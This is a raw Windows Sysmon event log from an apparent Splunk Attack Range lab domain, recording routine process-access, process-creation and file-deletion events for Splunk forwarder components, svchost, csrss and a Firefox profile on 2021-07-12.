08:11:24.988{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F92C-60EB-FA79-00000000D001}764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.988{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92C-60EB-FA79-00000000D001}764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.965{0C1E0330-F92C-60EB-FA79-00000000D001}764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000811057Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.808{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8662D830C2588ABC1C0BCE5E7BE153E3,SHA256=7E61DEF22E24E3A6D3619C8509B1A1ECA2F67F139D25079B99A9869BC17B3CDB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811056Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.480{0C1E0330-F92C-60EB-F979-00000000D001}37803756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92C-60EB-F979-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F92C-60EB-F979-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.293{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92C-60EB-F979-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:24.279{0C1E0330-F92C-60EB-F979-00000000D001}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000811087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.980{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=665D9C0972C4A713BED10110AB0B42A3,SHA256=BB063E11E6016D953CEF0BE55D80B646BFB377979F8DDED95A0CE13124F9833C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.840{0C1E0330-F92D-60EB-FB79-00000000D001}340952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:25.768{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\permissions.sqlite-journalMD5=389AD9CBFC4A5391ADD91EBE5A9EC936,SHA256=0D1A524244521C09CCE4E33661C08DA72B5C59F63ED206A62BA085D2BCBCC752,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:25.000{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49B71B3A038C96785D80B92603096750,SHA256=B4B3D75AF14AE6EF7E246F87A9E54F36477F0AA3031F4C24A363560DE6874035,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92D-60EB-FB79-00000000D001}340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:25.683{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 